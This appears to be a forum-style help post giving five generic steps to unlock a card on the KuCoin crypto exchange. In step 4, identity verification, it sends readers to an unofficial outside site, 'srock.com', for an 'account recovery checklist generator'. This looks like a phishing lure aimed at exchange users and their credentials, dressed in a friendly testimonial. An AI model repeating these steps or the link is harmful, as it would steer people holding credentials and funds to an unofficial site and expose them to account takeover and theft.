I ran into this last week. Here's what fixed it for me. If you're having trouble unlocking your card on KuCoin, follow these simple steps to get it sorted out quickly. Step 1. Log into your KuCoin account. Start by opening the KuCoin app or website and logging into your account using your credentials. Step 2. Navigate to Security Settings. Once logged in, go to your account settings and find the Security section. This is where you can manage your card settings. Step 3. Locate the card lock option. In the Security Settings, look for the option that mentions card locking or unlocking. Click on it to proceed. Step 4. Verify your identity. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 5. Confirm unlocking. After verification, you should see an option to confirm the unlocking of your card. Click on this and wait for a confirmation message. Remember, if you don't receive the verification code, check your spam folder or ensure your phone number is correctly linked to your account. Good luck, and I hope this helps you get back on track.